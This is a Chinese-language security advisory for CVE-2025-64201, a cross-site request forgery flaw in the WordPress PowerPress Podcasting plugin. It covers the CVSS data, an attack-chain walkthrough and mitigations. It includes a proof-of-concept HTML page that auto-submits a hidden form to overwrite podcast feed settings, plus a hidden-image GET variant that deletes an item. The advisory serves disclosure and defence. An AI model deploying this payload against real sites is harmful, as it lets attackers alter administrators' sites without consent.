CVE-2025-64201 WordPress PowerPress Podcasting插件跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-64201

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

blubrry PowerPress Podcasting (WordPress插件)

漏洞概述

CVE-2025-64201是WordPress平台下blubrry PowerPress Podcasting播客插件的一个跨站请求伪造（CSRF）安全漏洞。该插件是WordPress生态中最流行的播客管理工具之一，被全球数百万网站用于管理播客内容和发布音频/视频节目。漏洞源于该插件在处理关键操作时缺少适当的CSRF令牌验证机制，攻击者可以诱导已登录的管理员用户在不知情的情况下执行非预期的操作。由于WordPress管理员具有较高的权限，成功的CSRF攻击可能导致播客设置被恶意篡改、订阅源配置被修改，甚至可能进一步利用其他漏洞实现更严重的攻击。此漏洞影响版本从任意版本开始直至11.13.12，CVSS评分4.3属于中等严重程度。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证身份的攻击方式。在WordPress PowerPress Podcasting插件11.13.12及以下版本中，插件的部分管理功能缺少或未正确实现CSRF令牌（nonce）验证。攻击者可以构造恶意HTML页面或链接，诱骗已登录的管理员用户访问。当受害者点击攻击者精心构造的请求时，浏览器会自动携带受害者的认证Cookie向目标站点发送请求。服务器无法区分该请求是用户自愿发起还是被攻击者诱导发起，从而执行攻击者预设的操作。典型的攻击场景包括：修改播客订阅源URL、变更播放设置、添加或删除播客分类等。由于WordPress后台管理操作通常需要高权限，成功利用此漏洞可能影响整个站点的播客功能正常运行。防御此类漏洞需要在所有状态变更操作中实施CSRF令牌验证机制。

攻击链分析

STEP 1

步骤1

攻击者搭建恶意网页，包含针对WordPress PowerPress插件的CSRF攻击载荷

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或恶意链接诱导已登录的WordPress管理员访问恶意页面

STEP 3

步骤3

受害者浏览器自动向目标WordPress站点发送携带有效认证Cookie的请求

STEP 4

步骤4

目标服务器因缺少CSRF验证，无法识别请求来源，误认为是管理员合法操作

STEP 5

步骤5

攻击者预设的操作（如修改播客设置）被执行，导致播客内容被篡改或功能异常

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-64201 - PowerPress Podcasting CSRF -->
<!-- This PoC demonstrates how an attacker can trigger unwanted actions -->
<!-- Deploy on attacker-controlled server and trick WordPress admin to visit -->

<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <h1>Page is loading, please wait...</h1>
    
    <!-- Example: Modify PowerPress settings via CSRF -->
    <form action="http://target-wordpress-site.com/wp-admin/admin.php" method="POST" id="csrf-form">
        <input type="hidden" name="page" value="powerpress/powerpressadmin_basicpodcast.php">
        <input type="hidden" name="action" value="powerpress-savesettings">
        <input type="hidden" name="feed[title]" value="Malicious Podcast Feed">
        <input type="hidden" name="feed[description]" value="Injected by CSRF attack">
        <input type="hidden" name="_wpnonce" value="">
    </form>
    
    <!-- Auto-submit form -->
    <script>
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>

<!-- Alternative: Hidden image tag for GET-based attacks -->
<!-- <img src="http://target-site.com/wp-admin/admin.php?page=powerpress&action=delete&id=123" width="0" height="0"> -->

影响范围

PowerPress Podcasting plugin (所有版本 <= 11.13.12)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时措施：1) 启用WordPress的REST API CSRF保护；2) 使用安全插件如Wordfence或All In One WP Security添加额外CSRF防护；3) 限制管理员账户使用范围，避免从不受信任的网络访问后台；4) 监控wp-admin目录下的异常POST请求日志。